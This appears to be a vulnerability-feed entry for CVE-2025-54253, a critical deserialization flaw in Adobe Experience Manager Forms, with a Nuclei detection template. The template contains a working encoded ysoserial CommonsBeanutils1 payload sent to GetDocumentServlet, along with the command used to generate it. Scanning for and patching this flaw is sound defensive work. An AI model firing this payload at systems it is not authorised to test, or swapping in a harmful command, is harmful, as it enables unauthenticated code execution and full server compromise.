Adobe Experience Manager versions 6.5.23 and earlier are affected by a Misconfiguration vulnerability that could result in arbitrary code execution. An attacker could leverage this vulnerability to bypass security mechanisms and execute code. Exploitation of this issue does not require user interaction and scope is changed.
PoC代码[已公开]
id: CVE-2025-54253
info:
name: Adobe Experience Manager Forms - Insecure Deserialization
author: ritikchaddha,DhiyaneshDK,s4e-io
severity: critical
description: |
Adobe Experience Manager versions 6.5.23 and earlier are affected by a Misconfiguration vulnerability that could result in arbitrary code execution. An attacker could leverage this vulnerability to bypass security mechanisms and execute code. Exploitation of this issue does not require user interaction and scope is changed.
impact: |
Attackers can execute arbitrary code, potentially leading to full system compromise.
remediation: |
Update to the latest version beyond 6.5.23.
reference:
- https://slcyber.io/assetnote-security-research-center/struts-devmode-in-2025-critical-pre-auth-vulnerabilities-in-adobe-experience-manager-forms/
metadata:
verified: true
max-request: 1
note: |
Deserialization payload for blind RCE detection using ysoserial
java -DproperXalan=true -jar ysoserial-all.jar CommonsBeanutils1 "pwd" | gzip | base64 -w0
tags: cve,cve2025,aem,adobe,rce,kev,vkev
flow: http(1) && http(2)
http:
- raw:
- |
GET /lc/libs/livecycle/core/content/login.html HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- contains(body, "<title>Adobe Experience Manager forms</title>")
internal: true
- raw:
- |
GET /FormServer/servlet/GetDocumentServlet?serDoc={{url_encode('H4sIAOPj/2gAA61WT0wcVRj/vV1g6Hah0JYCrbX0Dxao3WkLpdQlYgFbVqcWBdvDHjZvZ58wdXZmOvNGFg8ePHk1evFoYvRgeyAx2ngw8erNxJPGxMTEg4l6qAeTxj/fmxlYyp9CK5vsvDff+77f9/d939z+DY2Bj86b/A2eC6Vl56Z9y/UtufhyKELx/vdnPrs/9vZSGqkCGgLrTWEgY7pVj/tcur7EAUNJ6kpSn1ih52segBQBn3L9uRz3uDkvciRXdZ0gVxbcUQJBbpx2damfP3zn1+DYR1MppB7QcgtvgRlo9nzXE75clNgba7W5M6fPSN9y5kgjaRvbQJvp2rYwpRXvlzGDXKK3bIu6Bff//KD3rrN0IQXUPIk2N5ReKKdjvZYIFhrIrTQp6l+lqMbJjlwtsKWZkz6v5WZF1bO5FEGB1l03rn3t3P50MA2tgJaS5VSEI18Kq2XhF9BaIgEnsIUsEL1mYHeJh7UJmweBCCQGDFKjx2r0SI0eqdH90JFWVehTPJiXyoV8EZlSeVEK060oyXSxOF5EU8lUUBSv4qqARfB5A40lh1eFCm6DgfbSWl8fzG2dHucW/9LPC/1I04t/d3fMzf0Qh00lnuip4vjte51/NTXP/pSQm7795p8vv6LjcxjNII1jGi5o6NXwFENbIHyL29eFH1CiXi1MMrAXGFomKGuSO/I6t0PReKfnvXvv/vjHswxNo5ZjSdqk+/qvMzRMkNsMewzLEXFsZ1VUGBWKaxIsJ3B6T4gNct4KGPbNyLA8m8R/mi/aLq8wZAuOI/wkBQznjcXAjY3TvZgniCNyhVfmhAxObICSZ9gVJfY1168y+H0GFZ4ehI6+Lp+WI4XvEHic2MlrV/PFDbmrdp03tocuo6/PJFuuCnyKOxVb+HkVkuaKa4ZVqjWG04+knkTnYxxyf/z/G8OQeb5mCi+6gRpOMnz8aPHY0oKKrOqTs1cv1aygQKSoAe1MDK0ETtXB41jBoCWxZLi0E5GccUPfFJctVcbZpAJz6pZmkcFuDX0Mg49RsAzPbTcjy63nUjmgEjflMhLD/qhbWG7d+Oi2Xdwu8jLSSrUwHNnCF0rRqGknraC93uJeiY3UMEAxI8bknaGjr99Yx5bP4mmczuAUctRQvIVKM85QlxA1YTKc7Fs/a1ZjUGM0BfXTLLW1QYUxRG1rRnLz9avcSxrO4bob0wvUXYaGzw0PDZ8dGhkZPj8ySG4aD2WgxK8P3sOzoeFiBs/gGI4iRSt5Q/+DaEQTrZpq0WiOaFQ19MwSRaeV0do48AXySxFLCz2bIqKOVnpmYwbswQit1EGxn7iU8Jiai4q2VnAoEuyJDxNBtevAgeicoRNdJNFN+9hGBXsogS1E1A1gRyLYgfhwQ9gncJgk1O5JHCH1dQXN6F9x+gSdKK49nyDNjLvQ9579HOdvLEWCw5FTTHH0RPqPop3WDB2lcBxt2BWq6Uk09t3KaDukRluHhk4NXRq6tzvabv1i/T5avdK1M6Mtfdl1142y3i1HGUltp8kcZDi+DShyvX5NrpVv0kfYpk1iq4se1XF6kzpmm9bxuroZXVPHe6PzfdFz/6rsHlDZpS/ABrqOvrfAUFOZbq39B+MrHXcvCwAA')}} HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- contains(body, 'InvocationTargetException')
- status_code == 200
condition: and
# digest: 4a0a00473045022100b6296805a52fcaa2257d975c5115eae9f9632da9cd3b6328140f5b37e01770a30220382fc43fa22cc41113e46548c8424a623086863162a40a878a02ba05643191ce:922c64590222798bb761d5b6d8e72950